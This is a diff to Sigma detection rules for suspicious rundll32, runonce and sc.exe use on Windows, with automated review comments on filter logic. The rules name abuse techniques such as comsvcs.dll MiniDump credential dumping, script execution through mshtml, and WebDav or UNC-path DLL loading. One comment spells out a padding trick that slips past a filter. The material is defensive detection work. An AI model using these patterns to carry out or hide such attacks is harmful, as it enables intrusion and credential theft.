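Review bot: `:\SystemVolumeInformation\` is not the folder's real name — the NTFS directory is `System Volume Information`, with spaces — so that entry can never match a `NewProcessName` and executables launched from there are missed; it should read `:\System Volume Information\`. The `NewProcessName|startswith: C:\Windows\…` entries also pin the system drive to `C:`; writing them as `NewProcessName|contains: ':\Windows\Tasks\'` and so on, the way the `RECYCLER` entry already is, keeps them working on hosts installed on another drive at the cost of matching those directories on any volume. Note also that the file is named `rundll32_run_locations` while the selection has no rundll32 image test at all, so the name overstates its scope.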
--- a/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_script_run.yml @@ -19,18 +19,17 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: rundll32 + CommandLine|contains: rundll32 selection2: - CommandLine|contains: + CommandLine|contains: - mshtml,RunHTMLApplication - mshtml,#135 selection3: - CommandLine|contains: + CommandLine|contains: - 'javascript:' - 'vbscript:' condition: process_creation and (all of selection*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml index 87dd4b2e7..c628c06aa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml @@ -19,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shell32.dll - Control_RunDLL - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%LocalAppData%' - '%Temp%' diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml index 2bf798a33..fe5310076 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml @@ -1,8 +1,7 @@ title: Potential ShellDispatch.DLL Functionality Abuse id: 82343930-652f-43f5-ab70-2ee9fdd6d5e9 status: experimental -description: Detects potential "ShellDispatch.dll" functionality abuse to execute - arbitrary binaries via "ShellExecute" +description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" references: - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ author: X__Junior (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: RunDll_ShellExecuteW + CommandLine|contains: RunDll_ShellExecuteW condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml index 6aa773c15..556605d7f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_activity.yml 
@@ -1,17 +1,15 @@ title: Potentially Suspicious Rundll32 Activity id: e593cf51-88db-4ee1-b920-37e89012a3c9 status: test -description: Detects suspicious execution of rundll32, with specific calls to some - DLLs with known LOLBIN functionalities +description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities references: - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ - https://twitter.com/Hexacorn/status/885258886428725250 - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52 - - https://twitter.com/nas_bench/status/1433344116071583746 - - https://twitter.com/eral4m/status/1479106975967240209 - - https://twitter.com/eral4m/status/1479080793003671557 -author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron - Systems) + - https://twitter.com/nas_bench/status/1433344116071583746 # dfshim.dll,ShOpenVerbShortcut + - https://twitter.com/eral4m/status/1479106975967240209 # scrobj.dll,GenerateTypeLib + - https://twitter.com/eral4m/status/1479080793003671557 # shimgvw.dll,ImageView_Fullscreen +author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/05/17 tags: 
@@ -25,91 +23,89 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - 'javascript:' - - .RegisterXLL - - CommandLine|contains|all: - - url.dll - - OpenURL - - CommandLine|contains|all: - - url.dll - - OpenURLA - - CommandLine|contains|all: - - url.dll - - FileProtocolHandler - - CommandLine|contains|all: - - zipfldr.dll - - RouteTheCall - - CommandLine|contains|all: - - shell32.dll - - Control_RunDLL - - CommandLine|contains|all: - - shell32.dll - - ShellExec_RunDLL - - CommandLine|contains|all: - - mshtml.dll - - PrintHTML - - CommandLine|contains|all: - - advpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - advpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieadvpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - ieadvpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieframe.dll - - OpenURL - - CommandLine|contains|all: - - shdocvw.dll - - OpenURL - - CommandLine|contains|all: - - syssetup.dll - - SetupInfObjectInstallAction - - CommandLine|contains|all: - - setupapi.dll - - InstallHinfSection - - CommandLine|contains|all: - - pcwutl.dll - - LaunchApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbShortcut - - CommandLine|contains|all: - - scrobj.dll - - GenerateTypeLib - - http - - CommandLine|contains|all: - - shimgvw.dll - - ImageView_Fullscreen - - http - - CommandLine|contains|all: - - comsvcs.dll - - MiniDump + - CommandLine|contains|all: + - 'javascript:' + - .RegisterXLL + - CommandLine|contains|all: + - url.dll + - OpenURL + - CommandLine|contains|all: + - url.dll + - OpenURLA + - CommandLine|contains|all: + - url.dll + - FileProtocolHandler + - CommandLine|contains|all: + - zipfldr.dll + - RouteTheCall + - CommandLine|contains|all: + - shell32.dll + - Control_RunDLL + - CommandLine|contains|all: + - shell32.dll + - ShellExec_RunDLL + - CommandLine|contains|all: + - mshtml.dll + - 
PrintHTML + - CommandLine|contains|all: + - advpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - advpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieadvpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - ieadvpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieframe.dll + - OpenURL + - CommandLine|contains|all: + - shdocvw.dll + - OpenURL + - CommandLine|contains|all: + - syssetup.dll + - SetupInfObjectInstallAction + - CommandLine|contains|all: + - setupapi.dll + - InstallHinfSection + - CommandLine|contains|all: + - pcwutl.dll + - LaunchApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbShortcut + - CommandLine|contains|all: + - scrobj.dll + - GenerateTypeLib + - http + - CommandLine|contains|all: + - shimgvw.dll + - ImageView_Fullscreen + - http + - CommandLine|contains|all: + - comsvcs.dll + - MiniDump filter_main_screensaver: - CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver - filter_main_parent_cpl: + CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver + filter_main_parent_cpl: # Settings ParentCommandLine|contains: .cpl - CommandLine|contains|all: + CommandLine|contains|all: - Shell32.dll - Control_RunDLL - .cpl ParentProcessName: C:\Windows\System32\control.exe filter_main_startmenu: - CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL - "C:\Windows\System32\' - CommandLine|endswith: .cpl", + CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\' + CommandLine|endswith: .cpl", ParentProcessName: C:\Windows\System32\control.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative 
tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml index b1487a473..006b58aa3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml @@ -1,8 +1,7 @@ title: Suspicious Control Panel DLL Load id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 status: test -description: Detects suspicious Rundll32 execution from control.exe as used by Equation - Group and Exploit Kits +description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits references: - https://twitter.com/rikvduijn/status/853251879320662017 - https://twitter.com/felixw3000/status/853354851128025088 @@ -22,10 +21,10 @@ detection: selection_parent: ParentProcessName|endswith: \System32\control.exe selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter: - CommandLine|contains: Shell32.dll + CommandLine|contains: Shell32.dll condition: process_creation and (all of selection_* and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml index a7f6be265..76463606f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml 
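Review bot: `filter_main_parent_cpl` depends on `ParentCommandLine|contains: .cpl`, and Security 4688 exposes `ParentProcessName` but no parent command line as far as I can tell, so on this channel that filter never evaluates true and every `control.exe` → `rundll32 Shell32.dll,Control_RunDLL <x>.cpl` launch from Settings alerts; only the exact quoted form in `filter_main_startmenu` is rescued. Either remove the `ParentCommandLine` line so the filter rests on what 4688 does carry (`ParentProcessName: C:\Windows\System32\control.exe` plus the `Shell32.dll`/`Control_RunDLL`/`.cpl` command-line test), or add a comment that this filter is inert on 4688 and the noise is expected. This is the only filter in the batch that reads a parent command line, so it is worth a converter-side check rather than a one-off edit.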
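Review bot: The filter `CommandLine|contains: Shell32.dll` drops any rundll32 spawned by control.exe whose command line contains `Shell32.dll` anywhere, so the direct DLL load this rule exists for can be hidden behind padding (`rundll32 C:\Users\Public\x.dll,Entry Shell32.dll`). Anchor the exclusion to the argument position the legitimate launch actually uses, e.g. `CommandLine|contains: ['rundll32.exe Shell32.dll,Control_RunDLL', 'rundll32.exe" Shell32.dll,Control_RunDLL']`, so only the real `Shell32.dll,Control_RunDLL` invocation is excluded. A comment on the filter stating that this is the control.exe applet path being whitelisted would make the intent obvious to whoever next widens it.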
@@ -1,11 +1,10 @@ title: Suspicious Rundll32 Execution With Image Extension id: 4aa6040b-3f28-44e3-a769-9208e5feb5ec related: - - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e - type: similar + - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e + type: similar status: experimental -description: Detects the execution of Rundll32.exe with DLL files masquerading as - image files +description: Detects the execution of Rundll32.exe with DLL files masquerading as image files references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Hieu Tran @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.exe + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .bmp - .cr2 - .eps diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml index 9d3308cc4..36b100c46 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml 
@@ -1,11 +1,10 @@ title: Suspicious Usage Of ShellExec_RunDLL id: d87bd452-6da1-456e-8155-7dc988157b7d related: - - id: 36c5146c-d127-4f85-8e21-01bf62355d5a - type: obsoletes + - id: 36c5146c-d127-4f85-8e21-01bf62355d5a + type: obsoletes status: test -description: Detects suspicious usage of the ShellExec_RunDLL function to launch other - commands as seen in the the raspberry-robin attack +description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack references: - https://redcanary.com/blog/raspberry-robin/ - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -23,9 +22,10 @@ detection: EventID: 4688 Channel: Security selection_openasrundll: - CommandLine|contains: ShellExec_RunDLL + CommandLine|contains: ShellExec_RunDLL selection_suspcli: - CommandLine|contains: + CommandLine|contains: + # Add more LOLBINs and Susp Paths - regsvr32 - msiexec - \Users\Public\ diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml index 3973f5859..9b8f8f3b4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml 
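Review bot: The rewritten description line still carries the doubled word in `as seen in the the raspberry-robin attack`; since the commit already touches that line it could read `as seen in the raspberry-robin attack`. In the second hunk the new `# Add more LOLBINs and Susp Paths` comment would be more useful if it said what qualifies for the list, e.g. `# Add more LOLBINs and suspicious paths commonly passed as ShellExec_RunDLL arguments`.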
@@ -17,23 +17,22 @@ detection: EventID: 4688 Channel: Security selection1a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - apphelp.dll selection1b: - CommandLine|contains: + CommandLine|contains: - ShimFlushCache - '#250' selection2a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - kernel32.dll selection2b: - CommandLine|contains: + CommandLine|contains: - BaseFlushAppcompatCache - '#46' - condition: process_creation and (( selection1a and selection1b ) or ( selection2a - and selection2b )) + condition: process_creation and (( selection1a and selection1b ) or ( selection2a and selection2b )) fields: - NewProcessName - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml index f20cdea8f..242524efd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_sys.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Activity Invoking Sys File id: 731231b9-0b5d-4219-94dd-abb6959aa7ea status: test -description: Detects suspicious process related to rundll32 based on command line - that includes a *.sys file as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: rundll32.exe + CommandLine|contains: rundll32.exe selection2: - CommandLine|contains: + CommandLine|contains: - .sys, - '.sys ' condition: process_creation and (all of selection*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml index e6764ff3d..0666059eb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_unc_path.yml @@ -1,8 +1,7 @@ title: Rundll32 UNC Path Execution id: 5cdb711b-5740-4fb2-ba88-f7945027afac status: test -description: Detects rundll32 execution where the DLL is located on a remote location - (share) +description: Detects rundll32 execution where the DLL is located on a remote location (share) references: - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml index d642b6279..2f65ad951 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml 
@@ -1,8 +1,7 @@ title: Rundll32 Execution With Uncommon DLL Extension id: c3a99af4-35a9-4668-879e-c09aeb4f2bdf status: experimental -description: Detects the execution of rundll32 with a command line that doesn't contain - a common extension +description: Detects the execution of rundll32 with a command line that doesn't contain a common extension references: - https://twitter.com/mrd0x/status/1481630810495139841?s=12 author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou @@ -19,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_known_extension: - CommandLine|contains: + CommandLine|contains: - .cpl - .dll - '.inf' filter_main_localserver: - CommandLine|contains: ' -localserver ' + CommandLine|contains: ' -localserver ' filter_main_zzzzInvokeManagedCustomActionOutOfProc: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Windows\Installer\MSI - .tmp - zzzzInvokeManagedCustomActionOutOfProc diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml index 2da23b225..38f2cc6a2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_user32_dll.yml @@ -1,8 +1,7 @@ title: Suspicious Workstation Locking via Rundll32 id: 3b5b0213-0460-4e3f-8937-3abf98ff7dcc status: test -description: Detects a suspicious call to the user32.dll function that locks the user - workstation +description: Detects a suspicious call to the user32.dll function that locks the user workstation references: - https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/ author: frack113 
@@ -18,20 +17,19 @@ detection: EventID: 4688 Channel: Security selection_call_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_call_parent: ParentProcessName|endswith: \cmd.exe selection_call_cli: - CommandLine|contains: user32.dll, + CommandLine|contains: user32.dll, selection_function: - CommandLine|contains: LockWorkStation + CommandLine|contains: LockWorkStation condition: process_creation and (all of selection_*) fields: - NewProcessName - ParentProcessName falsepositives: - - Scripts or links on the user desktop used to lock the workstation instead of - Windows+L or the menu option + - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml index fb8096b7c..3106727b0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml 
@@ -1,13 +1,9 @@ title: WebDav Client Execution Via Rundll32.EXE id: 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5 status: test -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like "C:\windows\system32\davclnt.dll,DavSetCookie". - - This could be an indicator of exfiltration or use of WebDav to launch code (hosted - on a WebDav server). - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". + This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). references: - https://github.com/OTRF/detection-hackathon-apt29/issues/17 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md @@ -27,10 +23,10 @@ detection: selection_parent: ParentProcessName|endswith: \svchost.exe selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml index d856c83f4..b1e9ae0be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml 
@@ -1,12 +1,8 @@ title: Suspicious WebDav Client Execution Via Rundll32.EXE id: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 status: experimental -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator - of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially - a sign of exploitation of CVE-2023-23397 - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 references: - https://twitter.com/aceresponder/status/1636116096506818562 - https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ @@ -29,15 +25,15 @@ detection: Channel: Security selection: ParentCommandLine|contains: -s WebClient - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} ParentProcessName|endswith: \svchost.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe filter_local_ips: - CommandLine|contains: - - ://10. - - ://192.168. - - ://172.16. + CommandLine|contains: + - ://10. # 10.0.0.0/8 + - ://192.168. # 192.168.0.0/16 + - ://172.16. # 172.16.0.0/12 - ://172.17. - ://172.18. - ://172.19. @@ -53,8 +49,8 @@ detection: - ://172.29. - ://172.30. - ://172.31. - - ://127. - - ://169.254. + - ://127. # 127.0.0.0/8 + - ://169.254. # 169.254.0.0/16 condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown 
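Review bot: The new `# 172.16.0.0/12` comment sits on the `://172.16.` entry, but that prefix only matches 172.16.x.x; the /12 is covered only by the sixteen `://172.16.` through `://172.31.` entries together, so the comment is better placed as a header above that run, e.g. `# 172.16.0.0/12 (172.16. - 172.31.)`. The filter stops at RFC 1918, loopback and link-local; whether shared address space (100.64.0.0/10, RFC 6598) should also be treated as local depends on the environment and deserves a comment either way. The filter_local_ips block spans the second and third hunks of this file.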
diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml index 91c39cbc0..2e913c913 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_without_parameters.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without Parameters id: 5bb68627-3198-40ca-b458-49f973db8752 status: test -description: Detects rundll32 execution without parameters as observed when running - Metasploit windows/smb/psexec exploit module +description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module references: - https://bczyz1.github.io/2021/01/30/psexec.html author: Bartlomiej Czyz, Relativity @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - rundll32.exe - rundll32 condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml b/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml index 25f7e47db..0215e54fa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_runonce_execution.yml @@ -1,8 +1,7 @@ title: Run Once Task Execution as Configured in Registry id: 198effb6-6c98-4d0c-9ea3-451fa143c45c status: test -description: This rule detects the execution of Run Once task as configured in the - registry +description: This rule detects the execution of Run Once task as configured in the registry references: - https://twitter.com/pabraeken/status/990717080805789697 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/ 
@@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \runonce.exe - - Description: Run Once Wrapper + - NewProcessName|endswith: \runonce.exe + - Description: Run Once Wrapper selection_cli: - - CommandLine|contains: /AlternateShellStartup - - CommandLine|endswith: /r + - CommandLine|contains: /AlternateShellStartup + - CommandLine|endswith: /r condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml b/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml index 27dbb9d57..3934d2817 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml @@ -1,8 +1,7 @@ title: Possible Privilege Escalation via Weak Service Permissions id: d937b75f-a665-4480-88a5-2f20e9f9b22a status: test -description: Detection of sc.exe utility spawning by user with Medium integrity level - to change service ImagePath or FailureCommand +description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/30/weak-service-permissions/ @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security scbynonadmin: - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe MandatoryLabel: S-1-16-8192 selection_binpath: - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath selection_failure: - CommandLine|contains|all: + CommandLine|contains|all: - failure - command condition: process_creation and (scbynonadmin and 1 of selection_*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml b/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml index 25f249e8e..a77c5cf14 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_create_service.yml @@ -1,8 +1,8 @@ title: New Service Creation Using Sc.EXE id: 85ff530b-261d-48c6-a441-facaa2e81e48 related: - - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 - type: similar + - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 # Using PowerShell + type: similar status: test description: Detects the creation of a new service using the "sc.exe" utility. references: @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe condition: process_creation and selection falsepositives: - Legitimate administrator or user creates a service for legitimate reasons. diff --git a/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml b/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml index 75ae474bb..4abd8dda9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sc_disable_service.yml @@ -1,8 +1,7 @@ title: Service StartupType Change Via Sc.EXE id: 85c312b7-f44d-4a51-a024-d671c40b49fc status: test -description: Detect the use of "sc.exe" to change the startup type of a service to - "disabled" or "demand" +description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) 
